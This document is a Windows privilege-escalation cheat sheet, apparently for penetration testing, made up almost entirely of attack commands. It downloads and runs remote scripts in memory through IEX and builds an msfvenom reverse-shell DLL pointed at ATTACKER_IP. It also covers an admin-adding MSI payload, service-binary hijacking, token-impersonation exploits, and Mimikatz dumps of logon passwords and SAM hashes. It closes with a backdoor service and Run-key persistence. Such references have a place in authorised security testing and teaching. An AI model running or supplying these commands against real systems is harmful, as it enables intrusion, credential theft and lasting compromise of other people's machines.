Windows Privilege Escalation

Phase 1: System Information Gathering

Basic System Info

systeminfo | findstr /B /C:"OS Name" /C:"OS Version" /C:"System Type"
whoami /all
net user
net localgroup
net localgroup administrators
hostname
ipconfig /all

Current User Privileges

whoami /priv
whoami /groups
net user %username%

Phase 2: Automated Enumeration

WinPEAS (Primary Tool)

# Download and run WinPEAS (console output is also saved to winpeas_output.txt)
curl -L https://github.com/carlospolop/PEASS-ng/releases/latest/download/winPEASx64.exe -o winPEAS.exe
.\winPEAS.exe | Tee-Object -FilePath "winpeas_output.txt"

# Alternative: PowerShell version
IEX(New-Object Net.WebClient).DownloadString('https://raw.githubusercontent.com/carlospolop/PEASS-ng/master/winPEAS/winPEASps1/winPEAS.ps1')

PowerUp.ps1 (Alternative)

# Download and load PowerUp in memory, then run all of its checks
IEX(New-Object Net.WebClient).DownloadString('https://raw.githubusercontent.com/PowerShellMafia/PowerSploit/master/Privesc/PowerUp.ps1')
Invoke-AllChecks

# Or copy from Kali
cp /usr/share/powershell-empire/empire/server/data/module_source/privesc/PowerUp.ps1 .

Windows Exploit Suggester

# Run systeminfo and save output
systeminfo > systeminfo.txt

# On Kali, run the exploit suggester against the saved systeminfo output
python3 /opt/wesng/wes.py systeminfo.txt

Phase 3: Service Enumeration & Exploitation

Service Permissions

# List all services
sc query state= all

# Check file permissions on a service binary (example path)
icacls "C:\Program Files\Service\service.exe"

# List ACLs on the service registry keys to spot weak key permissions
Get-Acl -Path "HKLM:\SYSTEM\CurrentControlSet\Services\*" | Format-Table

# PowerShell service enumeration
Get-WmiObject win32_service | Select-Object Name, State, PathName | Where-Object {$_.State -like 'Running'}

Unquoted Service Paths

# Find unquoted service paths
wmic service get name,displayname,pathname,startmode | findstr /i "auto" | findstr /i /v "c:\windows\\" | findstr /i /v """

# PowerShell method
Get-WmiObject -Class Win32_Service | Where-Object {$_.PathName -notlike '*"*' -and $_.PathName -like '* *'} | Select-Object Name, PathName, StartMode

Service Binary Hijacking

# If service binary is writable
icacls "C:\Program Files\Service\service.exe"

# Replace with malicious binary
copy evil.exe "C:\Program Files\Service\service.exe"

# Restart service
net stop ServiceName
net start ServiceName

Phase 4: Registry Exploitation

AlwaysInstallElevated

# Check if AlwaysInstallElevated is enabled
reg query HKLM\SOFTWARE\Policies\Microsoft\Windows\Installer /v AlwaysInstallElevated
reg query HKCU\SOFTWARE\Policies\Microsoft\Windows\Installer /v AlwaysInstallElevated

# If both keys return 0x1 (the setting must be enabled in HKLM and HKCU), create an MSI payload
msfvenom -p windows/adduser USER=hacker PASS=password123 -f msi > evil.msi
msiexec /quiet /qn /i evil.msi

Registry AutoRuns

# Check startup programs
reg query HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Run
reg query HKCU\SOFTWARE\Microsoft\Windows\CurrentVersion\Run

# Check for writable startup locations
icacls "C:\ProgramData\Microsoft\Windows\Start Menu\Programs\Startup"

Phase 5: Scheduled Tasks & Processes

Scheduled Tasks

# List scheduled tasks
schtasks /query /fo LIST /v

# List the binary each task runs (check those paths for write access separately)
schtasks /query /fo LIST /v | findstr /B /C:"Task To Run"

# PowerShell method
Get-ScheduledTask | Where-Object {$_.State -eq "Ready"} | Select-Object TaskName,TaskPath

Process Monitoring

# List running processes with their command lines (credentials sometimes appear in arguments)
Get-WmiObject Win32_Process | Select-Object ProcessId,Name,CommandLine

# Use Process Monitor (ProcMon) for detailed analysis

Phase 6: DLL Hijacking

DLL Search Order

# Standard DLL search order (locations are tried in this order when a DLL is missing)
# 1. Application directory
# 2. System32
# 3. System
# 4. Windows directory
# 5. Current directory
# 6. PATH directories

# Find processes loading DLLs from writable directories

DLL Hijacking Exploitation

# Create malicious DLL
msfvenom -p windows/x64/shell_reverse_tcp LHOST=ATTACKER_IP LPORT=4444 -f dll > evil.dll

# Place in writable location in DLL search path
copy evil.dll "C:\Writable\Path\missing.dll"

Phase 7: Token Impersonation

SeImpersonatePrivilege Abuse

# Check whether SeImpersonatePrivilege or SeAssignPrimaryTokenPrivilege is held
whoami /priv

# If present, use one of the token impersonation tools below (SweetPotato, PrintSpoofer, JuicyPotato) or RoguePotato

Token Impersonation Tools (Preferred Methods)

# SweetPotato (Recommended - works on most systems)
.\SweetPotato.exe -p c:\windows\system32\cmd.exe -a "/c whoami"

# PrintSpoofer (For Windows Server 2016/2019)
.\PrintSpoofer64.exe -i -c cmd

# JuicyPotato (For older versions)
.\JuicyPotato.exe -l 1337 -p c:\windows\system32\cmd.exe -a "/c whoami > C:\temp\output.txt" -t *

Phase 8: Credential Hunting

Password Files & History

# Search for password files
dir /s *password*
dir /s *cred*
dir /s *vnc*
dir /s *.config

# PowerShell credential hunting
Get-ChildItem -Path C:\ -Include *password*,*cred*,*vnc* -Recurse -Force -ErrorAction SilentlyContinue

PowerShell History

# Check PowerShell history
type %userprofile%\AppData\Roaming\Microsoft\Windows\PowerShell\PSReadline\ConsoleHost_history.txt

# All users' PowerShell history
Get-ChildItem -Path C:\Users\*\AppData\Roaming\Microsoft\Windows\PowerShell\PSReadLine\ -Name ConsoleHost_history.txt -Recurse

Registry Credentials

# VNC passwords
reg query HKLM\SOFTWARE\RealVNC\WinVNC4 /v password
reg query HKLM\SOFTWARE\TightVNC\Server

# Auto-logon credentials stored by Winlogon
reg query "HKLM\SOFTWARE\Microsoft\Windows NT\Currentversion\Winlogon"

# Saved credentials
cmdkey /list

Memory Credential Extraction

# Mimikatz one-liners (requires local admin or SYSTEM; privilege::debug enables SeDebugPrivilege)
.\mimikatz.exe "privilege::debug" "sekurlsa::logonpasswords" "exit"
.\mimikatz.exe "privilege::debug" "sekurlsa::wdigest" "exit"
.\mimikatz.exe "privilege::debug" "sekurlsa::msv" "exit"

# Dump cached domain logon credentials
.\mimikatz.exe "privilege::debug" "lsadump::cache" "exit"

# Dump SAM hashes
.\mimikatz.exe "privilege::debug" "lsadump::sam" "exit"

# PowerShell version (if available)
IEX(New-Object Net.WebClient).DownloadString('https://raw.githubusercontent.com/PowerShellMafia/PowerSploit/master/Exfiltration/Invoke-Mimikatz.ps1')
Invoke-Mimikatz -Command '"privilege::debug" "sekurlsa::logonpasswords"'

Phase 9: Windows Exploits

Common Windows CVEs

# Check Windows version and patch level
systeminfo | findstr /B /C:"OS Name" /C:"OS Version" /C:"Hotfix"

# Common vulnerabilities to check against the installed hotfix list:
# MS16-032 (Secondary Logon Handle)
# MS17-010 (EternalBlue)
# CVE-2020-0796 (SMBGhost)
# CVE-2021-1675 (PrintNightmare)

Kernel Exploits

# Use kernel exploits only as a last resort: a failed attempt can crash or destabilise the host
# Check Exploit-DB for exploits specific to the detected Windows version and patch level

Phase 10: Active Directory Privilege Escalation

PowerView.ps1

# Download and load PowerView in memory
IEX(New-Object Net.WebClient).DownloadString('https://raw.githubusercontent.com/PowerShellMafia/PowerSploit/master/Recon/PowerView.ps1')

# Basic AD enumeration
Get-Domain
Get-DomainUser
Get-DomainGroup
Get-DomainComputer

BloodHound Data Collection

# Using SharpHound
.\SharpHound.exe -c All

# Using bloodhound-python (from attacker machine)
bloodhound-python -d domain.local -u username -p password -gc DC_IP -c all

Phase 11: Post-Exploitation & Persistence

Add User to Administrators

net user hacker password123 /add
net localgroup administrators hacker /add

Create Service Backdoor

sc create evil binpath= "cmd.exe /c net user hacker password123 /add && net localgroup administrators hacker /add"
sc start evil

Registry Persistence

reg add HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Run /v evil /t REG_SZ /d "C:\temp\backdoor.exe"

Common Windows Privilege Escalation Vectors

High Priority Checks

  1. AlwaysInstallElevated registry keys
  2. Unquoted service paths with write permissions
  3. Service binary permissions (writable executables)
  4. SeImpersonatePrivilege for token impersonation
  5. Scheduled tasks running as SYSTEM
  6. DLL hijacking opportunities
  7. Stored credentials in registry/files

Medium Priority Checks

  1. Weak service permissions
  2. Registry autoruns with write access
  3. Group Policy Preferences passwords
  4. PowerShell history files
  5. Configuration files with credentials

Tools & Scripts

PowerShell Tools

PowerUp.ps1         - Privilege escalation enumeration
PowerView.ps1       - Active Directory enumeration
Sherlock.ps1        - Exploit suggester
Invoke-Mimikatz.ps1 - Credential dumping

Compiled Tools

WinPEAS.exe         - Comprehensive enumeration
SweetPotato.exe     - Token impersonation (preferred)
PrintSpoofer.exe    - Token impersonation (newer Windows)
JuicyPotato.exe     - Token impersonation (older Windows)
Mimikatz.exe        - Credential extraction

Next Steps

  1. Run automated tools first (WinPEAS, PowerUp)
  2. Focus on high-impact vectors (services, tokens, registry)
  3. Hunt for credentials systematically
  4. Test kernel exploits only as last resort
  5. Establish persistence once elevated

Resources